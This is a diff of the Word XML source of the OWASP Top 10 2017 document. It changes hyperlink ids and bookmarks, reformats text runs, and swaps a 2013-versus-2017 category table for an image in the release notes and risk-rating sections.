         <w:t xml:space="preserve">Learn more at: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId14">
+      <w:hyperlink r:id="rId13">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2578,7 +2537,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2673,60 +2632,85 @@
       <w:r>
         <w:t xml:space="preserve">ge and high performing organizations to use the </w:t>
       </w:r>
+      <w:hyperlink r:id="rId15">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Application Security Verification Standard</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> if a true standard is required, but for most, the OWASP Top 10 is a great start on the application secu</w:t>
+      </w:r>
+      <w:r>
+        <w:t>rity journey.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t>We have written up a range of suggested next steps for different users of the OWASP Top 10, including "What's next for developers", "What's next for testers", "What's next for organizations" which is suitable for CIO's and CISO's, "What's nex</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t for application managers", which is suitable for application owners.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t>In the long term, we encourage all software development teams and organizations to create an application security program that is compatible with your culture and technology. These prog</w:t>
+      </w:r>
+      <w:r>
+        <w:t>rams come in all shapes and sizes. Leverage your organization's existing strengths to do and measure what works for you.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t>We hope that the OWASP Top 10 is useful to your application security efforts. Please don't hesitate to contact OWASP with your question</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s, comments, and ideas at our GitHub project repository:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
       <w:hyperlink r:id="rId16">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Application Security Verification Standard</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> if a true standard is required, but for most, the OWASP Top 10 is a great start on the application secu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>rity journey.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t>We have written up a range of suggested next steps for different users of the OWASP Top 10, including "What's next for developers", "What's next for testers", "What's next for organizations" which is suitable for CIO's and CISO's, "What's nex</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t for application managers", which is suitable for application owners.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t>In the long term, we encourage all software development teams and organizations to create an application security program that is compatible with your culture and technology. These prog</w:t>
-      </w:r>
-      <w:r>
-        <w:t>rams come in all shapes and sizes. Leverage your organization's existing strengths to do and measure what works for you.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t>We hope that the OWASP Top 10 is useful to your application security efforts. Please don't hesitate to contact OWASP with your question</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s, comments, and ideas at our GitHub project repository:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
+          <w:t>https://github.com/OWASP/Top10/issues</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>You can find OWASP Top 10 project and translations here:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
         </w:numPr>
       </w:pPr>
       <w:hyperlink r:id="rId17">
@@ -2734,7 +2718,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>https://github.com/OWASP/Top10/issues</w:t>
+          <w:t>https://www.owasp.org/index.php/top10</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -2743,31 +2727,6 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>You can find OWASP Top 10 project and translations here:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId18">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://www.owasp.org/index.php/top10</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
         <w:t>Lastly, we wish to thank the founding leadership of the OWASP Top 10 project, Dave Wichers and Jeff Williams for all their efforts, and believing in us to get this finished with the community's help. Thank yo</w:t>
       </w:r>
       <w:r>
@@ -2827,7 +2786,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="13" w:name="i-introduction"/>
-      <w:bookmarkStart w:id="14" w:name="_Toc496378416"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc496437894"/>
       <w:bookmarkEnd w:id="13"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -2910,29 +2869,29 @@
       <w:r>
         <w:t xml:space="preserve">. There are hundreds of issues that could affect the overall security of a web application as discussed in the </w:t>
       </w:r>
+      <w:hyperlink r:id="rId18">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Developer's Guide</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> and the </w:t>
+      </w:r>
       <w:hyperlink r:id="rId19">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Developer's Guide</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> and the </w:t>
+          <w:t>OWASP Cheat Sheet Series</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">. These are essential reading for anyone developing web applications and APIs. Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the </w:t>
       </w:r>
       <w:hyperlink r:id="rId20">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Cheat Sheet Series</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">. These are essential reading for anyone developing web applications and APIs. Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId21">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2977,7 +2936,7 @@
       <w:r>
         <w:t xml:space="preserve">pplication security controls, OWASP is maintaining and promoting the </w:t>
       </w:r>
-      <w:hyperlink r:id="rId22">
+      <w:hyperlink r:id="rId21">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3016,7 +2975,7 @@
       <w:r>
         <w:t xml:space="preserve">. Focus on making security an integral part of your culture throughout your development organization. Find out more in the </w:t>
       </w:r>
-      <w:hyperlink r:id="rId23">
+      <w:hyperlink r:id="rId22">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3105,7 +3064,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="18" w:name="rn-release-notes"/>
-      <w:bookmarkStart w:id="19" w:name="_Toc496378417"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc496437895"/>
       <w:bookmarkEnd w:id="18"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -3210,10 +3169,19 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>A4:2017 XML Externa</w:t>
-      </w:r>
-      <w:r>
-        <w:t>l Entity (XXE) is a new category primarily supported by SAST data sets. </w:t>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>A4:2017 - XML Exter</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>nal Entity (XXE)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is a new category primarily supported by SAST data sets. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3232,10 +3200,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>We asked the community to provide insight into two forward looking weakness categories. After 516 peer submissions, and  removing issues that we</w:t>
-      </w:r>
-      <w:r>
-        <w:t>re already supported by data (such as Sensitive Data Exposure and XXE), the two new issues are </w:t>
+        <w:t xml:space="preserve">We asked the community to provide insight into two forward looking weakness categories. After 516 peer submissions, and  removing issues that </w:t>
+      </w:r>
+      <w:r>
+        <w:t>were already supported by data (such as Sensitive Data Exposure and XXE), the two new issues are </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3247,7 +3215,13 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>A8:2017-Insecure Deserialization, responsible for one of the worst breaches of all time, and</w:t>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>A8:2017 - Insecure Deserialization</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, responsible for one of the worst breaches of all time, and</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3259,10 +3233,16 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>A10:2017-Insufficient Logging and Monitoring, the lack of which can</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> prevent or significantly delay malicious activity and breach detection, incident response and digital forensics.</w:t>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>A10:2017 - Insufficient Logging and Monitoring</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, the lack of whi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ch can prevent or significantly delay malicious activity and breach detection, incident response and digital forensics.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3342,497 +3322,71 @@
         <w:t>. Less than 1% of the data set supports this issue today, as it’s now #25</w:t>
       </w:r>
     </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="0" w:type="pct"/>
-        <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="4529"/>
-        <w:gridCol w:w="466"/>
-        <w:gridCol w:w="4365"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:tcBorders>
-              <w:bottom w:val="single" w:sz="0" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-            <w:vAlign w:val="bottom"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>OWASP Top 10 2</w:t>
-            </w:r>
-            <w:r>
-              <w:t>013</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:tcBorders>
-              <w:bottom w:val="single" w:sz="0" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-            <w:vAlign w:val="bottom"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>+/-</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:tcBorders>
-              <w:bottom w:val="single" w:sz="0" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-            <w:vAlign w:val="bottom"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>OWASP Top 10 2017</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A1 - Injection</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>-&gt;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A1:2017 – Injection</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:lastRenderedPageBreak/>
-              <w:t>A2 - Broken authentication and Session Management</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>-&gt;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A2:2017 – Broken Authentication</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A3 – Cross-Site Scripting (XSS)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>v</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A3:2013 – Sensitive Data Exposure</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A4 – Insecure Direct Object References [Merged+A7]</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>M</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A4:2017 – XML External Entity (XXE) [NEW]</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A5 – Security Misconfiguration</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>v</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A5:2017 – Broken Access Control [Merged]</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A6 – Sensitive Data Exposure</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>^</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A6:2017 – Security Misconfiguration</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A7 – Missing Function Level Access Control [Merged+A4]</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>M</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A7:2017 – Cross-Site Scripting (XSS)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A8 – Cross-Site Request Forgery (CSRF)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>X</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A8:2017 – Insecure Deserialization [NEW, Community]</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A9 – Using Components with Known Vulnerabilities</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>-&gt;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A9:2017 – Using</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> Components with Known Vulnerabilities</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A10 – Unvalidated Redirects and Forwards</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>X</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>A10:2017 – Insufficient Logging &amp; Monitoring [NEW, Comm.]</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5943600" cy="3294452"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="5" name="Picture"/>
+            <wp:cNvGraphicFramePr/>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture" descr="images/0x06-release-notes-1.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3294452"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="21" w:name="risk---application-security-risks"/>
-      <w:bookmarkStart w:id="22" w:name="_Toc496378418"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc496437896"/>
       <w:bookmarkEnd w:id="21"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Risk - Application Security Risks</w:t>
+        <w:t>Risk - Appli</w:t>
+      </w:r>
+      <w:r>
+        <w:t>cation Security Risks</w:t>
       </w:r>
       <w:bookmarkEnd w:id="22"/>
     </w:p>
@@ -3851,7 +3405,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.</w:t>
+        <w:t>Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enoug</w:t>
+      </w:r>
+      <w:r>
+        <w:t>h to warrant attention.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3866,7 +3423,7 @@
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5943600" cy="2091589"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="5" name="Picture"/>
+            <wp:docPr id="6" name="Picture"/>
             <wp:cNvGraphicFramePr/>
             <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
@@ -3910,13 +3467,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Sometimes, these paths are trivia</w:t>
-      </w:r>
-      <w:r>
-        <w:t>l to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it may put you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with ea</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ch threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization. Together, these factors determine your overall risk.</w:t>
+        <w:t>Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it may put you out of business. To determine the risk to your organ</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization. Together, these factors determine your overall risk.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3945,10 +3499,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which </w:t>
-      </w:r>
-      <w:r>
-        <w:t>is based on the OWASP Risk Rating Methodology.  </w:t>
+        <w:t xml:space="preserve"> focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technic</w:t>
+      </w:r>
+      <w:r>
+        <w:t>al impact using the following simple ratings scheme, which is based on the OWASP Risk Rating Methodology.  </w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -4314,7 +3868,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>In this edition, we have changed the risk rating system around compared to previous version to assist with our ranking of likelihoods and impacts. This is not an issue within the document, but is clear in the public data analysis.</w:t>
+        <w:t>In this edition, we have changed the risk rating system around compared to previous ver</w:t>
+      </w:r>
+      <w:r>
+        <w:t>sion to assist with our ranking of likelihoods and impacts. This is not an issue within the document, but is clear in the public data analysis.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4323,13 +3880,13 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Each organization is uniq</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ue, and so are the threat actors for that organization, their goals, and the impact of any breach. If a public interest organization uses a CMS for public information and a health system uses that same exact CMS for sensitive health records, the threat act</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ors and business impacts are very different for the same exact software. It is critical that you apply your custom threat agents and business impacts based upon the data asset criticality.</w:t>
+        <w:t xml:space="preserve">Each organization is unique, and so are the threat actors for that organization, their goals, and the impact of </w:t>
+      </w:r>
+      <w:r>
+        <w:t>any breach. If a public interest organization uses a CMS for public information and a health system uses that same exact CMS for sensitive health records, the threat actors and business impacts are very different for the same exact software. It is critical</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> that you apply your custom threat agents and business impacts based upon the data asset criticality.</w:t>
       </w:r>
     </w:p>
     <w:p>
